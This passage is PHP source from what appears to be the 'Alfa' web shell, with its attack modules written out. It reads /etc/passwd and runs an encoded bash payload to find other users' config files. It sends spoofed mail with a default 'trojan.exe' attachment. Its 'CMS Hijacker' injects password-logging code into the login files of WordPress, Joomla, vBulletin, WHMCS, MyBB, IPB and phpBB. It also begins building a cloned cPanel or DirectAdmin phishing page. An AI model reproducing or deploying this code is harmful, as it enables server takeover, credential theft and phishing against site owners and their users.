6132$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
6133}elseif($m=='shtml'){
6134$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
6135}
6136@__write_file($d.'.htaccess',$code);
6137}
6138function alfabasedir(){
6139alfahead();
6140echo '<div class=header>
6141<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
6142$passwd = _alfa_file('/etc/passwd');
6143if(is_array($passwd)){
6144$users = array();
6145$makepwd = alfaMakePwd();
6146$basedir = @ini_get('open_basedir');
6147$safe_mode = @ini_get('safe_mode');
6148if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
6149$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
6150$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
6151$bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
6152$users = json_decode($bash_users, true);
6153$x=count($users);
6154if($x>=2){array_pop($users);--$x;}
6155}
6156if(!$basedir&&!$safe_mode){
6157$x=0;
6158foreach($passwd as $str){
6159$pos = strpos($str,':');
6160$username = substr($str,0,$pos);
6161$dirz = str_replace("{user}", $username, $makepwd);
6162if(($username != '')){
6163if (@is_readable($dirz)){
6164array_push($users,$username);
6165$x++;
6166}}}
6167}
6168echo '<br><br>';
6169echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
6170echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
6171echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
6172foreach($users as $user){
6173if(empty($user))continue;
6174$path = str_replace("{user}", $user, $makepwd);
6175echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
6176}
6177}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
6178echo '<br><br></b>';
6179echo '</div>';
6180alfafooter();
6181}
6182function alfamail(){
6183alfahead();
6184echo '<div class=header>';
6185AlfaNum(8,9,10);
6186echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
6187$table = array(
6188'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
6189'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
6190'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
6191'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
6192'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
6193);
6194create_table($table);
6195echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
6196if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
6197$mail_to = $_POST['alfa1'];
6198$mail_from = $_POST['alfa2'];
6199$mail_subject = $_POST['alfa3'];
6200$mail_content = $_POST['alfa5'];
6201$count_mail = (int)$_POST['alfa6'];
6202$mail_attach = $_POST['alfa7'];
6203if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
6204if(!empty($mail_attach)&&@is_file($mail_attach)){
6205$file = $mail_attach;
6206$content = __read_file($file);
6207$content = chunk_split(__ZW5jb2Rlcg($content));
6208$uid = md5(uniqid(time()));
6209$filename = basename($file);
6210$headers = "From: ".$mail_from." <".$mail_from.">\r\n";
6211$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
6212$headers .= "Reply-To: ".$mail_from."\r\n";
6213$headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
6214$headers .= 'MIME-Version: 1.0' . "\r\n";
6215$headers .= 'X-Mailer: php' . "\r\n";
6216$mail_content = "--".$uid."\r\n";
6217$mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
6218$mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
6219$mail_content .= $mail_content."\r\n\r\n";
6220$mail_content .= "--".$uid."\r\n";
6221$mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
6222$mail_content .= "Content-Transfer-Encoding: base64\r\n";
6223$mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
6224$mail_content .= $content."\r\n\r\n";
6225$mail_content .= "--".$uid."--";
6226}else{
6227$headers = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
6228$headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
6229$headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
6230$headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
6231$headers .= 'MIME-Version: 1.0' . "\r\n";
6232$headers .= 'X-Mailer: php' . "\r\n";
6233}
6234if(empty($count_mail)||$count_mail<1)$count_mail=1;
6235if(!empty($mail_from)){echo __pre();
6236for($i=1;$i<=$count_mail;$i++){
6237if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
6238}}else{__alert("Invalid Mail From !");}
6239}else{__alert("Invalid Mail To !");}
6240}
6241echo('</div>');
6242alfafooter();
6243}
6244function alfaziper(){
6245alfahead();
6246AlfaNum(8,9,10);
6247echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
6248<form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
6249<div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
6250<div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
6251<input type="submit" value=" " name="ziper" />
6252</form></center></p>';
6253if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
6254$dirzip = $_POST['alfa3'];
6255$zipfile = $_POST['alfa4'];
6256if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
6257alfaEx("powershell Compress-Archive -Path '".addslashes($dirzip)."' -DestinationPath '".addslashes(basename($zipfile))."'");
6258echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6259}elseif($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
6260alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."'");
6261echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6262}elseif(class_exists('ZipArchive')){
6263if(__alfaziper($dirzip, $zipfile)){
6264echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
6265}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
6266}
6267}
6268echo '</div>';
6269alfafooter();
6270}
6271function __alfaziper($source,$destination){
6272 if(!extension_loaded('zip')||!file_exists($source)){
6273 return false;
6274 }
6275 $zip=new ZipArchive();
6276 if(!$zip->open($destination,ZIPARCHIVE::CREATE)){
6277 return false;
6278 }
6279 $source=str_replace('\\','/',realpath($source));
6280 if(is_dir($source)===true){
6281 $files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);
6282 foreach($files as $file){
6283 $file=str_replace('\\','/',$file);
6284 if(in_array(substr($file,strrpos($file,'/')+1),array('.','..')))continue;
6285 $file=realpath($file);
6286 if(is_dir($file)===true){
6287 $zip->addEmptyDir(str_replace($source.'/','',$file.'/'));
6288 }else if(is_file($file)===true){
6289 $zip->addFromString(str_replace($source.'/','',$file),file_get_contents($file));
6290 }
6291 }
6292 }else if(is_file($source)===true){
6293 $zip->addFromString(basename($source),file_get_contents($source));
6294 }
6295 return $zip->close();
6296}
6297function alfadeziper(){
6298alfahead();
6299AlfaNum(8,9,10);
6300echo '<div class=header><p><center><p><div class="txtfont_header">| DeCompressor |</div></p>
6301<form onSubmit="g(\'deziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
6302<div class="txtfont">File: </div> <input type="text" name="dirzip" value="'.(!empty($_POST['alfa3'])?htmlspecialchars($_POST['alfa3']):htmlspecialchars($GLOBALS['cwd'])).'" size="60"/>
6303<div class="txtfont">Extract To: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'" size="60"/>
6304<input type="submit" value=" " name="ziper" />
6305</form></center></p>';
6306if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
6307$dirzip = $_POST['alfa3'];
6308$zipfile = $_POST['alfa4'];
6309if(@!is_dir($zipfile)){
6310 @mkdir($zipfile, 0777, true);
6311}
6312$finfo = "";
6313$file_type = "";
6314if(function_exists('finfo_open')){
6315$finfo = @finfo_open(FILEINFO_MIME_TYPE);
6316$file_type = @finfo_file($finfo, $dirzip);
6317@finfo_close($finfo);
6318}else{
6319 if($GLOBALS['sys']=='unix'&&_alfa_can_runCommand(true,true)){
6320 $file_type = alfaEx('file -b --mime-type ' . $dirzip);
6321 }
6322}
6323if($GLOBALS['sys']!='unix'&&_alfa_can_runCommand(true,true)){
6324alfaEx("powershell expand-archive -path '".addslashes($dirzip)."' -destinationpath '".addslashes(basename($zipfile))."'");
6325echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font></b></p></center>';
6326}elseif($GLOBALS['sys']=='unix'&&!empty($file_type)&&_alfa_can_runCommand(true,true)&&(strlen(alfaEx('which unzip')) > 0||strlen(alfaEx('which tar')) > 0||strlen(alfaEx('which gunzip')) > 0)){
6327switch ($file_type) {
6328 case 'application/zip':
6329 alfaEx("cd '".addslashes($zipfile)."';unzip '".addslashes($dirzip)."'");
6330 break;
6331 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
6332 if(strstr(basename($dirzip), ".tar.gz")||strstr(basename($dirzip), ".tar")){
6333 alfaEx("cd '".addslashes($zipfile)."';tar xzf '".addslashes($dirzip)."'");
6334 }else{
6335 alfaEx("cd '".addslashes($zipfile)."';gunzip '".addslashes($dirzip)."'");
6336 }
6337 break;
6338}
6339echo __pre().'<center><p>Done -> <b><font color="green">'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></b></p></center>';
6340}elseif(class_exists('ZipArchive')){
6341 $itsok = false;
6342 if(emtpy($file_type)){
6343 $file_type = "application/zip";
6344 }
6345 switch ($file_type) {
6346 case 'application/zip':
6347 $zip = new ZipArchive;
6348 $res = $zip->open($dirzip);
6349 if ($res) {
6350 $zip->extractTo($zipfile);
6351 $zip->close();
6352 $itsok = true;
6353 }
6354 break;
6355 case 'application/x-tar': case 'application/x-gzip': case 'application/x-gtar':
6356 if(strstr(basename($dirzip), ".tar.gz")){
6357 $new_file = $zipfile .'/'. basename($dirzip);
6358 @copy($dirzip, $new_file);
6359 $new_tar = str_replace(".tar.gz", ".tar", $new_file);
6360 try {
6361 $p = new PharData($new_file);
6362 $p->decompress();
6363 $phar = new PharData($new_tar);
6364 $phar->extractTo($zipfile);
6365 @unlink($new_file);
6366 @unlink($new_tar);
6367 $itsok = true;
6368 } catch (Exception $e) {
6369 }
6370 }else{
6371 try {
6372 $phar = new PharData($dirzip);
6373 $phar->extractTo($zipfile);
6374 $itsok = true;
6375 } catch (Exception $e) {
6376 }
6377 }
6378 break;
6379 }
6380if($itsok){
6381echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font> <a style="cursor:pointer;" onclick="g(\'FilesMan\',\''.$zipfile.'\');">[ View Folder ]</a></p></center>';
6382}else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
6383}
6384}
6385echo '</div>';
6386alfafooter();
6387}
6388function alfacmshijacker(){
6389alfahead();
6390AlfaNum(5,6,7,8,9,10);
6391echo '<div class=header><br>
6392<center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
6393<div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
6394$cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
6395foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
6396echo("</select>");
6397echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
6398SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
6399<input type="submit" name="btn" value=" "></form></center><br>';
6400$cms = $_POST['alfa1'];
6401$saveto = $_POST['alfa2'];
6402$cmspath = $_POST['alfa4'];
6403if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
6404echo __pre();
6405alfaHijackCms($cms,$cmspath,$saveto);
6406}
6407echo '</div>';
6408alfafooter();
6409}
6410function alfaHijackCms($cms,$cmspath,$saveto){
6411switch($cms){
6412case "vb":
6413hijackvBulletin($cmspath,$saveto);
6414break;
6415case "wp":
6416hijackwp($cmspath,$saveto);
6417break;
6418case "jom":
6419hijackJoomla($cmspath,$saveto);
6420break;
6421case "whmcs":
6422hijackWhmcs($cmspath,$saveto);
6423break;
6424case "mybb":
6425hijackMybb($cmspath,$saveto);
6426break;
6427case "ipb":
6428hijackIPB($cmspath,$saveto);
6429break;
6430case "phpbb":
6431hijackPHPBB($cmspath,$saveto);
6432break;
6433default:
6434echo "error!";
6435break;
6436}
6437}
6438function hijackvBulletin($path,$saveto){
6439$code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' . $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
6440$clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
6441$code=str_replace('{saveto_path}',$saveto,$code);
6442$login = $path."/login.php";
6443$class = $path."/includes/class_bootstrap.php";
6444$dologin = 'do_login_redirect();';
6445$evil_login = "\t".$code."\n\t".$dologin;
6446$evil_class = "true";
6447if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
6448$data_login = @file_get_contents($login);
6449$data_class = @file_get_contents($class);
6450if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
6451$login_replace = str_replace($dologin,$evil_login, $data_login);
6452$class_replace = str_replace($clearpw,$evil_class, $data_class);
6453@file_put_contents($login, $login_replace);
6454@file_put_contents($class, $class_replace);
6455hijackOutput(0,$saveto);
6456}else{
6457hijackOutput(1);
6458}
6459}else{
6460hijackOutput(1);
6461}
6462}
6463function hijackwp($path,$saveto){
6464$code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
6465$redirect_wp = '#if[ ]{0,}\([ ]{0,}![ ]{0,}is_wp_error\([ ]{0,}\$user[ ]{0,}\)[ ]{0,}&&[ ]{0,}![ ]{0,}\$reauth[ ]{0,}\)[ ]{0,}{#';
6466$code=str_replace('{saveto_path}',$saveto,$code);
6467$login=$path."/wp-login.php";
6468if(@is_file($login) AND @is_writable($login)){
6469$data_login = @file_get_contents($login);
6470if(@preg_match($redirect_wp, $data_login, $match)){
6471$evil_login = "\t".$match[0]."\n\t".$code;
6472$login_replace = @preg_replace($redirect_wp,$evil_login, $data_login);
6473@file_put_contents($login, $login_replace);
6474hijackOutput(0,$saveto);
6475}else{
6476hijackOutput(1);
6477}
6478}else{
6479hijackOutput(1);
6480}
6481}
6482function hijackJoomla($path,$saveto){
6483$code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
6484$code=str_replace('{saveto_path}',$saveto,$code);
6485$comp=$path."/administrator/components/com_login/";
6486if(@is_file($comp."/login.php")){
6487$login = $comp."/login.php";
6488}elseif(@is_file($comp."/admin.login.php")){
6489$login = $comp."/admin.login.php";
6490}else{
6491$login = '';
6492}
6493if(@is_file($login) AND @is_writable($login) AND $login != ''){
6494$data_login = @file_get_contents($login);
6495$evil_login = $code."\n".$data_login;
6496@file_put_contents($login, $evil_login);
6497hijackOutput(0,$saveto);
6498}else{
6499hijackOutput(1);
6500}
6501}
6502function hijackWhmcs($path,$saveto){
6503$code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' . $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
6504$code=str_replace('{saveto_path}',$saveto,$code);
6505$conf=$path."/configuration.php";
6506if(@is_file($conf) AND @is_writable($conf)){
6507$data_conf = @file_get_contents($conf);
6508if(!strstr($data_conf,'?>'))$code = '?>'.$code;
6509$evil_conf = $data_conf."\n".$code;
6510@file_put_contents($conf, $evil_conf);
6511hijackOutput(0,$saveto);
6512}else{
6513hijackOutput(1);
6514}
6515}
6516function hijackMybb($path,$saveto){
6517$code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
6518$find = '$loginhandler->complete_login();';
6519$code=str_replace('{saveto_path}',$saveto,$code);
6520$login=$path."/member.php";
6521$evil_login = "\t".$code."\n\t".$find;
6522if(@is_file($login) AND @is_writable($login)){
6523$data_login = @file_get_contents($login);
6524if(strstr($data_login, $find)){
6525$login_replace = str_replace($find,$evil_login, $data_login);
6526@file_put_contents($login, $login_replace);
6527hijackOutput(0,$saveto);
6528}else{
6529hijackOutput(1);
6530}
6531}else{
6532hijackOutput(1);
6533}
6534}
6535function hijackIPB($path,$saveto){
6536$code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
6537$find = 'unset( $member[\'plainPassword\'] );';
6538$code=str_replace('{saveto_path}',$saveto,$code);
6539$login=$path."/admin/sources/handlers/han_login.php";
6540$evil_login = "\t".$find."\n\t".$code;
6541if(@is_file($login) AND @is_writable($login)){
6542$data_login = @file_get_contents($login);
6543if(strstr($data_login, $find)){
6544$login_replace = str_replace($find,$evil_login, $data_login);
6545@file_put_contents($login, $login_replace);
6546hijackOutput(0,$saveto);
6547}else{
6548hijackOutput(1);
6549}
6550}else{
6551hijackOutput(1);
6552}
6553}
6554function hijackPHPBB($path,$saveto){
6555$code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
6556$find = 'case \'login\':';
6557$code=str_replace('{saveto_path}',$saveto,$code);
6558$login=$path."/ucp.php";
6559$evil_login = "\t".$find."\n\t".$code;
6560if(@is_file($login) AND @is_writable($login)){
6561$data_login = @file_get_contents($login);
6562if(strstr($data_login, $find)){
6563$login_replace = str_replace($find,$evil_login, $data_login);
6564@file_put_contents($login, $login_replace);
6565hijackOutput(0,$saveto);
6566}else{
6567hijackOutput(1);
6568}
6569}else{
6570hijackOutput(1);
6571}
6572}
6573function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
6574function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
6575if(@is_dir($dir)){
6576$files=@scandir($dir);
6577foreach($files as $key => $value){
6578$path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
6579if(!@is_dir($path)){
6580if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
6581if($e=='str'){
6582$content = @file_get_contents($path);
6583if(strpos($content, $string) !== false){
6584echo str_replace('\\','/',$path) . "<br>";
6585}
6586}else{
6587if(strstr($value,$string)){
6588echo str_replace('\\','/',$path) . "<br>";
6589}
6590}
6591$results[] = $path;
6592}elseif($value != "." && $value != "..") {
6593Alfa_StrSearcher($path,$string,$ext,$e,$results);
6594$results[] = $path;
6595}}}}
6596function alfafakepage(){
6597 alfahead();
6598 AlfaNum(9,10);
6599 echo '<div class=header><br>
6600 <center><div class="txtfont_header">| Host Manager Fake page |</div></center><br><br><form onSubmit="g(\'fakepage\',null,this.clone_page.value,this.fake_root.value,\'>>\',this.logto.value,this.panel.value,this.inject_to.value,this.bind_on.value,this.count.value);return false;" method=\'post\'>
6601 <div class="txtfont" style="position: relative;left: 50%;transform: translate(-50%);"><div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Panel: </span><select style="width:100px;" name="panel">';
6602 $cm_array = array("cpanel"=>"Cpanel","directadmin"=>"DirectAdmin");
6603 foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
6604 echo("</select></div>");
6605 echo '<div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Clone page: </span><input size="50" type="text" name="clone_page" placeholder="eg: https://target.com:2083 | https://target.com:2222"></div>
6606 <div style="margin-bottom:6px;"><span>Fake page root: </span><input size="50" type="text" name="fake_root" value="'.$_SERVER["DOCUMENT_ROOT"].'/fake_page_root/"></div>
6607 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Inject to: </span><input size="50" type="text" name="inject_to" value="'.$_SERVER["DOCUMENT_ROOT"].'/index.php"></div>
6608 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Bind on: </span><input size="50" type="text" name="bind_on" placeholder="eg: '.$_SERVER["DOCUMENT_ROOT"].'/wp-login.php"></div>
6609 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Log To: </span><input size="50" type="text" name="logto" value="'.$GLOBALS['cwd'].'logs.txt"></div>
6610 <div style="margin-bottom:6px;"><span style="display: inline-block;width: 106px;">Count of Invalid login: </span><input size="20" type="text" name="count" value="3" style="text-align:center;"></div>
6611 <div style="text-align:center;"><input type="submit" name="btn" value=" "></div></div></form><br>';
6612 $clone_page = $_POST['alfa1'];
6613 $fake_root = $_POST['alfa2'];
6614 $logto = $_POST['alfa4'];
6615 $panel = $_POST['alfa5'];
6616 $inject_to = $_POST['alfa6'];
6617 $bind_on = $_POST['alfa7'];
6618 $count = $_POST['alfa8'];
6619 if(!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST['alfa3'] == '>>'){
6620 echo __pre();
6621 $target = $clone_page;
6622 $curl = new AlfaCURL();
6623 $source_page = $curl->Send($target);
6624 if(!empty($source_page)){
6625 $matched_form = "";
6626 if($panel == "cpanel"){
6627 if(preg_match('#<form(.*)id="login_form"(.*)>#', $source_page, $match)){
6628 $matched_form = $match[0];
6629 }
6630 }else{
6631 if(preg_match('#<form(.*?)>#', $source_page, $match)){
6632 $matched_form = $match[0];
6633 }
6634 }
6635 if(!empty($matched_form)){
6636 $fake = "";
6637 $pwd = str_replace($_SERVER["DOCUMENT_ROOT"], '', $fake_root);
6638 $uri = str_replace($_SERVER["DOCUMENT_ROOT"], '', $inject_to);
6639 if($panel == "cpanel"){
6640 $port = "2083";
6641 }else{
6642 $target = str_replace(array("http://", "https://"), "", $target);
6643 $port = explode(":",$target);
6644 $port = $port[1];
6645 }
6646 if(substr($uri, 0, 1) == "/"){
6647 $uri = substr($uri, 1);
6648 }
6649 $uri = $_SERVER["HTTP_ORIGIN"] . '/' . str_replace("index.php", "", $uri) . '?:' . $port;
6650 $log_url = $_SERVER["HTTP_ORIGIN"] . $pwd . '/log.php';
6651 if($panel == "cpanel"){
6652 $form = '<form novalidate id="login_form" action="'.$log_url.'" method="post" target="_top" style="visibility:">';
6653 }else{
6654 $form = '<form action="'.$log_url.'" method="post">';
6655 }
6656 $fake = str_replace($matched_form, $form, $source_page);
6657 if(@!is_dir($fake_root)){
6658 @mkdir($fake_root, 0777, true);
6659 }
6660
6661 $cookie_name = "alfa_fakepage_counter" . rand(9999,99999);
6662
6663 $post_user = 'user';
6664 $post_pass = 'pass';
6665 $resp_code = 'if(empty($user)){http_response_code(400);echo json_encode(array("message" => "no_username"));}else{http_response_code(401);}';
6666 if($panel != "cpanel"){
6667 $post_user = 'username';
6668 $post_pass = 'password';
6669 $resp_code = '@header("Location: ".$_SERVER[\'HTTP_REFERER\']);';
6670 }
6671
